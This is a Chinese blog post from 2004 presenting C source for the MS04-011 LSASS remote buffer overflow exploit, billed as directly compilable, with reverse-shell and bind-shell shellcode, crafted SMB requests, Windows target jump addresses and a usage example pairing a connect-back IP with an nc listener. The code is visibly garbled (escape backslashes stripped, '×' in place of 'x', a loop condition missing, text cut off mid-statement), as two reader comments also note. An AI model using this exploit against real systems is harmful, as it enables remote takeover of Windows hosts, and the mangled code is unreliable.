LSASS溢出原代码(可直接编译版本)

Posted by David on Sunday, December 26th 2004   

Digg it

Bookmark it

Stumble it

Email to friend

26
Dec

#include
#include
#pragma comment(lib, “ws2_32″)
// reverse shellcode
unsigned char reverseshell[] =
“xEBx10×5Bx4Bx33xC9×66xB9×25x01×80x34×0Bx99xE2xFA”
“xEBx05xE8xEBxFFxFFxFF”
“x70×62x99×99x99xC6xFDx38xA9×99x99×99x12xD9×95x12″
“xE9×85x34×12xF1×91x12×6ExF3×9DxC0×71x02×99x99×99″
“x7Bx60xF1xAAxABx99×99xF1xEExEAxABxC6xCDx66×8Fx12″
“x71xF3×9DxC0×71x1Bx99×99x99×7Bx60×18x75×09x98×99″
“x99xCDxF1×98x98×99x99×66xCFx89xC9xC9xC9xC9xD9xC9″
“xD9xC9×66xCFx8Dx12×41xF1xE6×99x99×98xF1×9Bx99×9D”
“x4Bx12×55xF3×89xC8xCAx66xCFx81×1Cx59xECxD3xF1xFA”
“xF4xFDx99×10xFFxA9×1Ax75xCDx14xA5xBDxF3×8CxC0×32″
“x7Bx64×5FxDDxBDx89xDDx67xDDxBDxA4×10xC5xBDxD1×10″
“xC5xBDxD5×10xC5xBDxC9×14xDDxBDx89xCDxC9xC8xC8xC8″
“xF3×98xC8xC8×66xEFxA9xC8×66xCFx9Dx12×55xF3×66x66″
“xA8×66xCFx91xCAx66xCFx85×66xCFx95xC8xCFx12xDCxA5″
“x12xCDxB1xE1×9Ax4CxCBx12xEBxB9×9Ax6CxAAx50xD0xD8″
“x34×9Ax5CxAAx42×96x27×89xA3×4FxEDx91×58x52×94x9A”
“x43xD9×72x68xA2×86xECx7ExC3×12xC3xBDx9Ax44xFFx12″
“x95xD2×12xC3×85x9Ax44×12x9Dx12×9Ax5Cx32xC7xC0×5A”
“x71×99x66×66x66×17xD7×97x75xEBx67×2Ax8Fx34×40x9C”
“x57×76x57×79xF9×52x74×65xA2×40x90×6Cx34×75x60×33″
“xF9×7ExE0×5FxE0″;
// bind shellcode
unsigned char bindshell[] =
“xEBx10×5Ax4Ax33xC9×66xB9×7Dx01×80x34×0Ax99xE2xFA”
“xEBx05xE8xEBxFFxFFxFF”
“x70×95x98×99x99xC3xFDx38xA9×99x99×99x12xD9×95x12″
“xE9×85x34×12xD9×91x12×41x12xEAxA5×12xEDx87xE1×9A”
“x6Ax12xE7xB9×9Ax62×12xD7×8DxAAx74xCFxCExC8×12xA6″
“x9Ax62×12x6BxF3×97xC0×6Ax3FxEDx91xC0xC6×1Ax5Ex9D”
“xDCx7Bx70xC0xC6xC7×12x54×12xDFxBDx9Ax5Ax48×78x9A”
“x58xAAx50xFFx12×91x12xDFx85×9Ax5Ax58×78x9Bx9Ax58″
“x12×99x9Ax5Ax12×63x12×6Ex1Ax5Fx97×12x49xF3×9AxC0″
“x71×1Ex99×99x99×1Ax5Fx94xCBxCFx66xCEx65xC3×12x41″
“xF3×9CxC0×71xEDx99×99x99xC9xC9xC9xC9xF3×98xF3×9B”
“x66xCEx75×12x41×5Ex9Ex9Bx99×9Dx4BxAAx59×10xDEx9D”
“xF3×89xCExCAx66xCEx69xF3×98xCAx66xCEx6DxC9xC9xCA”
“x66xCEx61×12x49×1Ax75xDDx12×6DxAAx59xF3×89xC0×10″
“x9Dx17×7Bx62×10xCFxA1×10xCFxA5×10xCFxD9xFFx5ExDF”
“xB5×98x98×14xDEx89xC9xCFxAAx50xC8xC8xC8xF3×98xC8″
“xC8×5ExDExA5xFAxF4xFDx99×14xDExA5xC9xC8×66xCEx79″
“xCBx66xCEx65xCAx66xCEx65xC9×66xCEx7DxAAx59×35x1C”
“x59xECx60xC8xCBxCFxCAx66×4BxC3xC0×32x7Bx77xAAx59″
“x5Ax71×76x67×66x66xDExFCxEDxC9xEBxF6xFAxD8xFDxFD”
“xEBxFCxEAxEAx99xDAxEBxFCxF8xEDxFCxC9xEBxF6xFAxFC”
“xEAxEAxD8×99xDCxE1xF0xEDxCDxF1xEBxFCxF8xFDx99xD5″
“xF6xF8xFDxD5xF0xFBxEBxF8xEBxE0xD8×99xEExEAxABxC6″
“xAAxABx99xCExCAxD8xCAxF6xFAxF2xFCxEDxD8×99xFBxF0″
“xF7xFDx99xF5xF0xEAxEDxFCxF7×99xF8xFAxFAxFCxE9xED”
“x99xFAxF5xF6xEAxFCxEAxF6xFAxF2xFCxEDx99″;

char req1[] =
“x00×00x00×85xFFx53×4Dx42×72x00×00x00×00x18×53xC8″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×00xFFxFE”
“x00×00x00×00x00×62x00×02x50×43x20×4Ex45×54x57×4F”
“x52×4Bx20×50x52×4Fx47×52x41×4Dx20×31x2Ex30×00x02″
“x4Cx41×4Ex4Dx41×4Ex31×2Ex30×00x02×57x69×6Ex64×6F”
“x77×73x20×66x6Fx72×20x57×6Fx72×6Bx67×72x6Fx75×70″
“x73×20x33×2Ex31×61x00×02x4Cx4Dx31×2Ex32×58x30×30″
“x32×00x02×4Cx41×4Ex4Dx41×4Ex32×2Ex31×00x02×4Ex54″
“x20×4Cx4Dx20×30x2Ex31×32x00″;
char req2[] =
“x00×00x00xA4xFFx53×4Dx42×73x00×00x00×00x18×07xC8″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×00xFFxFE”
“x00×00x10×00x0CxFFx00xA4×00x04×11x0Ax00×00x00×00″
“x00×00x00×20x00×00x00×00x00xD4×00x00×80x69×00x4E”
“x54×4Cx4Dx53×53x50×00x01×00x00×00x97×82x08xE0×00″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×00x00×00″
“x57×00x69×00x6Ex00×64x00×6Fx00×77x00×73x00×20x00″
“x32×00x30×00x30×00x30×00x20×00x32×00x31×00x39×00″
“x35×00x00×00x57×00x69×00x6Ex00×64x00×6Fx00×77x00″
“x73×00x20×00x32×00x30×00x30×00x30×00x20×00x35×00″
“x2Ex00×30x00×00x00×00x00″;

char req3[] =
“x00×00x00xDAxFFx53×4Dx42×73x00×00x00×00x18×07xC8″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×00xFFxFE”
“x00×08x20×00x0CxFFx00xDAx00×04x11×0Ax00×00x00×00″
“x00×00x00×57x00×00x00×00x00xD4×00x00×80x9Fx00×4E”
“x54×4Cx4Dx53×53x50×00x03×00x00×00x01×00x01×00x46″
“x00×00x00×00x00×00x00×47x00×00x00×00x00×00x00×40″
“x00×00x00×00x00×00x00×40x00×00x00×06x00×06x00×40″
“x00×00x00×10x00×10x00×47x00×00x00×15x8Ax88xE0×48″
“x00×4Fx00×44x00×00x81×19x6Ax7AxF2xE4×49x1Cx28xAF”
“x30×25x74×10x67×53x57×00x69×00x6Ex00×64x00×6Fx00″
“x77×00x73×00x20×00x32×00x30×00x30×00x30×00x20×00″
“x32×00x31×00x39×00x35×00x00×00x57×00x69×00x6Ex00″
“x64×00x6Fx00×77x00×73x00×20x00×32x00×30x00×30x00″
“x30×00x20×00x35×00x2Ex00×30x00×00x00×00x00″;

char req4[] =
“x00×00x00×5CxFFx53×4Dx42×75x00×00x00×00x18×07xC8″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×00xFFxFE”
“x00×08x30×00x04xFFx00×5Cx00×08x00×01x00×31x00×00″
“x5Cx00×5Cx00×31x00×39x00×32x00×2Ex00×31x00×36x00″
“x38×00x2Ex00×31x00×2Ex00×32x00×31x00×30x00×5Cx00″
“x49×00x50×00x43×00x24″
“x00×00x00×3Fx3Fx3Fx3Fx3Fx00″;
char req5[] =
“x00×00x00×64xFFx53×4Dx42xA2×00x00×00x00×18x07xC8″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×08xDCx04″
“x00×08x40×00x18xFFx00xDExDEx00×0Ex00×16x00×00x00″
“x00×00x00×00x9Fx01×02x00×00x00×00x00×00x00×00x00″
“x00×00x00×00x03×00x00×00x01×00x00×00x40×00x00×00″
“x02×00x00×00x03×11x00×00x5Cx00×6Cx00×73x00×61x00″
“x72×00x70×00x63×00x00×00″;
char req6[] =
“x00×00x00×9CxFFx53×4Dx42×25x00×00x00×00x18×07xC8″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×08xDCx04″
“x00×08x50×00x10×00x00×48x00×00x00×00x04×00x00×00″
“x00×00x00×00x00×00x00×00x00×54x00×48x00×54x00×02″
“x00×26x00×00x40×59x00×10x5Cx00×50x00×49x00×50x00″
“x45×00x5Cx00×00x00×00x00×05x00×0Bx03×10x00×00x00″
“x48×00x00×00x01×00x00×00xB8×10xB8×10x00×00x00×00″
“x01×00x00×00x00×00x01×00x6Ax28×19x39×0CxB1xD0×11″
“x9BxA8×00xC0×4FxD9×2ExF5×00x00×00x00×04x5Dx88×8A”
“xEBx1CxC9×11x9FxE8×08x00×2Bx10×48x60×02x00×00x00″;
char req7[] =
“x00×00x0CxF4xFFx53×4Dx42×25x00×00x00×00x18×07xC8″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×08xDCx04″
“x00×08x60×00x10×00x00xA0×0Cx00×00x00×04x00×00x00″
“x00×00x00×00x00×00x00×00x00×54x00xA0×0Cx54×00x02″
“x00×26x00×00x40xB1×0Cx10×5Cx00×50x00×49x00×50x00″
“x45×00x5Cx00×00x00×00x00×05x00×00x03×10x00×00x00″
“xA0×0Cx00×00x01×00x00×00x88×0Cx00×00x00×00x09×00″
“xECx03×00x00×00x00×00x00xECx03×00x00″;
// room for shellcode here …
char shit1[] =
“x95×14x40×00x03×00x00×00x7Cx70×40x00×01x00×00x00″
“x00×00x00×00x01×00x00×00x00×00x00×00x01×00x00×00″
“x00×00x00×00x01×00x00×00x00×00x00×00x01×00x00×00″
“x00×00x00×00x01×00x00×00x00×00x00×00x01×00x00×00″
“x00×00x00×00x01×00x00×00x00×00x00×00x7Cx70×40x00″
“x01×00x00×00x00×00x00×00x01×00x00×00x00×00x00×00″
“x7Cx70×40x00×01x00×00x00×00x00×00x00×01x00×00x00″
“x00×00x00×00x7Cx70×40x00×01x00×00x00×00x00×00x00″
“x01×00x00×00x00×00x00×00x78×85x13×00xABx5BxA6xE9″;
char req8[] =
“x00×00x10xF8xFFx53×4Dx42×2Fx00×00x00×00x18×07xC8″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×08xFFxFE”
“x00×08x60×00x0ExFFx00xDExDEx00×40x00×00x00×00xFF”
“xFFxFFxFFx08×00xB8×10x00×00xB8×10x40×00x00×00x00″
“x00xB9×10xEEx05×00x00×01x10×00x00×00xB8×10x00×00″
“x01×00x00×00x0Cx20×00x00×00x00×09x00xADx0Dx00×00″
“x00×00x00×00xADx0Dx00×00″;
// room for shellcode here …
char req9[] =
“x00×00x0FxD8xFFx53×4Dx42×25x00×00x00×00x18×07xC8″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×08x18×01″
“x00×08x70×00x10×00x00×84x0Fx00×00x00×04x00×00x00″
“x00×00x00×00x00×00x00×00x00×54x00×84x0Fx54×00x02″
“x00×26x00×00x40×95x0Fx00×5Cx00×50x00×49x00×50x00″
“x45×00x5Cx00×00x00×00x00×05x00×00x02×10x00×00x00″
“x84×0Fx00×00x01×00x00×00x6Cx0Fx00×00x00×00x09×00″;

char shit3[] =
“x00×00x00×00x9AxA8×40x00×01x00×00x00×00x00×00x00″
“x01×00x00×00x00×00x00×00x01×00x00×00x00×00x00×00″
“x01×00x00×00x00×00x00×00x01×00x00×00x00×00x00×00″
“x01×00x00×00″
“x00×00x00×00x01×00x00×00x00×00x00×00x01×00x00×00″
“x00×00x00×00x9AxA8×40x00×01x00×00x00×00x00×00x00″
“x01×00x00×00x00×00x00×00x9AxA8×40x00×01x00×00x00″
“x00×00x00×00x01×00x00×00x00×00x00×00x9AxA8×40x00″
“x01×00x00×00x00×00x00×00x01×00x00×00x00×00x00×00″;

#define LEN 3500
#define BUFSIZE 2000
#define NOP 0×90
struct targets {
int num;
char name[50];
long jmpaddr;
} ttarget[]= {
{ 0, “WinXP Professional [universal] lsass.exe “, 0×01004600 }, // jmp esp addr
{ 1, “Win2k Professional [universal] netrap.dll”, 0×7515123c }, // jmp ebx addr
{ 2, “Win2k Advanced Server [SP4] netrap.dll”, 0×751c123c }, // jmp ebx addr
//{ 3, “reboot”, 0xffffffff }, // crash
{ NULL }
};
void usage(char *prog)
{
int i;
printf(”MS04-011 LSASRV.DLL Remote Exploitn”);
printf(”Compiled by HBU-LK007 (LK007@163.com)n”);
printf(”Usage:nn”);
printf(”%s [connectback IP] [options]nn”, prog);
printf(”Targets:n”);
for (i=0; i<3; i++)
printf(” %d [0x%.8x]: %sn”, ttarget.num, ttarget.jmpaddr, ttarget.name);
printf(”nOptions:n”);
printf(” -t: Detect remote OS:n”);
printf(” Windows 5.1 - WinXPn”);
printf(” Windows 5.0 - Win2knn”);
printf(”Example:n”);
printf(”LSASS 0 192.168.1.10 4444 -tn”);
printf(”LSASS 0 192.168.1.10 4444n”);
printf(”nc 192.168.1.10 4444n”);
exit(0);
}

int main(int argc, char *argv[])
{
int i;
int opt = 0;
char *target;
char hostipc[40];
char hostipc2[40*2];
unsigned short port;
unsigned long ip;
unsigned char *sc;
char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char req4u[sizeof(req4)+20];
char screq[BUFSIZE+sizeof(req7)+1500+440];
char screq2k[4348+4060];
char screq2k2[4348+4060];
char recvbuf[1600];
char strasm[]=”x66×81xECx1Cx07xFFxE4″;
char strBuffer[BUFSIZE];
unsigned int targetnum = 0;
int len, sockfd;
short dport = 445;
struct hostent *he;
struct sockaddr_in their_addr;
char smblen;
char unclen;
WSADATA wsa;

printf(”nMS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1n”);
printf(”— Coded by .::[ houseofdabus ]::. —nn”);

if (argc < 4) {
usage(argv[0]);
}
target = argv[2];
sprintf((char *)hostipc,"\%s\ipc$", target);
for (i=0; i<40; i++) {
hostipc2[i*2] = hostipc;
hostipc2[i*2+1] = 0;
}
memcpy(req4u, req4, sizeof(req4)-1);
memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);
memcpy(req4u+47+strlen(hostipc)*2, req4+87, 9);
smblen = 52+(char)strlen(hostipc)*2;
memcpy(req4u+3, &smblen, 1);
unclen = 9 + (char)strlen(hostipc)*2;
memcpy(req4u+45, &unclen, 1);
if (argc > 4)
if (!memcmp(argv[4], “-t”, 2)) opt = 1;
if ( (argc > 4) && !opt ) {
port = htons(atoi(argv[3]))^(USHORT)0×9999;
ip = inet_addr(argv[4])^(ULONG)0×99999999;
memcpy(&reverseshell[118], &port, 2);
memcpy(&reverseshell[111], &ip, 4);
sc = reverseshell;
} else {
port = htons(atoi(argv[3]))^(USHORT)0×9999;
memcpy(&bindshell[176], &port, 2);
sc = bindshell;
}

if ( (atoi(argv[1]) == 1) || (atoi(argv[1]) == 2)) {
memset(buf, NOP, LEN);
//memcpy(&buf[2020], “x3cx12×15x75″, 4);
memcpy(&buf[2020], &ttarget[atoi(argv[1])].jmpaddr, 4);
memcpy(&buf[2036], sc, strlen(sc));
memcpy(&buf[2840], “xebx06xebx06″, 4);
memcpy(&buf[2844], &ttarget[atoi(argv[1])].jmpaddr, 4); // jmp ebx addr
//memcpy(&buf[2844], “x3cx12×15x75″, 4); // jmp ebx addr
memcpy(&buf[2856], sc, strlen(sc));
for (i=0; i sendbuf[i*2] = buf;
sendbuf[i*2+1] = 0;
}
sendbuf[LEN*2]=0;
sendbuf[LEN*2+1]=0;
memset(screq2k, 0x31, (BUFSIZE+sizeof(req7)+1500)*2);
memset(screq2k2, 0x31, (BUFSIZE+sizeof(req7)+1500)*2);
} else {
memset(strBuffer, NOP, BUFSIZE);
memcpy(strBuffer+160, sc, strlen(sc));
memcpy(strBuffer+1980, strasm, strlen(strasm));
*(long *)&strBuffer[1964]=ttarget[atoi(argv[1])].jmpaddr;
}
memset(screq, 0x31, BUFSIZE+sizeof(req7)+1500);
WSAStartup(MAKEWORD(2,0),&wsa);
if ((he=gethostbyname(argv[2])) == NULL) { // get the host info
perror("[-] gethostbyname ");
exit(1);
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
exit(1);
}

their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(dport);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), ‘

Popularity: 11% [?]

Related posts

  • No related posts.
Related Content

Subscribe to the post comments feeds or Leave a trackback

Filed under: 手记     
   

2 Comments Already

commenter
爱尔兰神驴 Said,
August 11th, 2006 @10:47  

你这个代码有一行少了点东西哦,能不能给个全的阿

[Reply]
commenter
爱尔兰神驴 Said,
August 11th, 2006 @10:48  

for (i=0; i
sendbuf[i*2] = buf;
sendbuf[i*2+1] = 0;
}

就这个地方,好像循环的条件没有写全哦

[Reply]

Related Post

Please Leave Your Comments Below

Please Note: All comments will be moderated

« 记录
杭州下好大的雪阿~~ »